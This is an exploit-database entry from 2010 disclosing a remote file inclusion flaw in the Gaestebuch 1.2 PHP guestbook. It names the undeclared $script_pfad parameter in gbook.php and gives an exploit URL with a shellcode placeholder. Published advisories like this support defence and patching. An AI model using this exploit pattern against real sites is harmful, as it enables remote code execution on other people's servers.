Gaestebuch 1.2 Remote File Inclusion Vulnerability

2010-08-2600:00:00

bd0rk

0day.today

JSON

Exploit for php platform in category web applications

==================================================
Gaestebuch 1.2 Remote File Inclusion Vulnerability
==================================================

[~] Affected-Software: HINNENDAHL.COM Gaestebuch 1.2
 
[~] Vendor: http://www.hinnendahl.com/
 
[~] Download: http://www.hinnendahl.com/index.php?seite=download
 
[*] Greetz: inj3ct0r, DNX, Chip D3 Bi0s
 
 
Description: The $script_pfad parameter in /guestbook/gbook.php
             isn't declared before require. So an attacker can execute some
             php-shellcode about it. (line 3 - 4)
 
 
 
[+]Exploit: http://www.example.com/guestbook/gbook.php?script_pfad=[SHELLCODE]
 
 
 
### The 21 years old, german Hacker bd0rk ### <---white-hat :-)



#  0day.today [2018-03-06]  #

JSON